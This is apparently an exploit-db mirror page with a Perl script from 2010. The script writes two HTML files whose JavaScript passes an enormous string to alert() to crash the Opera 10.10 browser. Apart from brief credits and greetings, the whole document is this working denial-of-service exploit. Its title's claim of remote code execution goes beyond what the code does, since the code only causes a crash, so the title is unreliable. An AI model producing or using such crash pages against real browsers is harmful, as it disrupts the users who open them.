Opera 10.10 – Remote Code Execution Denial of Service

  • 作者: cr4wl3r
    日期: 2010-02-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11332/
  • #!/usr/bin/perl
    
    
    # Title : Opera 10.10 Remote Code Execution DoS Exploit
    # Tested : Windows xp (sp2)
    
    # Description : Opera Web Browser is vulnerable DoS within its javascript tags (alert)
    # This issue can be exploited by using a large value in a alert tags to create an out-of-bounds memory access 
    # This have in advising at version 9.10 http://www.milw0rm.com/exploits/3871, and good news this issue still work on version 10.10
    
    # Credits to Dj7xpl \ first exploiter
    # Greetz : str0ke a great man :)
    #muts and exploit-db
    #opt!x hacker my best friend :d
    #and all INDONESIAN hacker community
    # cr4wl3r kiss your soul from Gorontalo - INDONESIA
    
    # Sorry for my bad english :p~
    
    print qq(
    ###################################################
    ## Opera 10.10 Remote Code Execution DoS Exploit ##
    ## Credits : Dj7xpl##
    ## http://www.milw0rm.com/exploits/3871##
    ## Author : cr4wl3r <cr4wl3r[!]linuxmail.org>##
    ## Greetz : str0ke, opt!x hacker, xoron##
    ## all member at manadocoding.net##
    ## all member at indonesianhacker.org##
    ###################################################
    );
    
    my $header = "<html>\n<script>\n";
    my $footer = "</script>\n</html>";
    
    
    my $uhoh1 = "var buf = 'A';\n".
     "while (buf.length <= 44444444) buf+=buf;\n".
     "alert(buf)\n";
    
    ##################################################################
    open(myfile,'>> uhoh1.html');
    print myfile $header.$uhoh1.$footer;
    ##################################################################
    
    
    my $uhoh2 = "alert(\'". "A" x 44444444 ."'\)"."\n";
    
    ##################################################################
    open(myfile,'>> uhoh2.html');
    print myfile $header.$uhoh2.$footer;
    ##################################################################
    
    print "\nDone, successfully created!\n";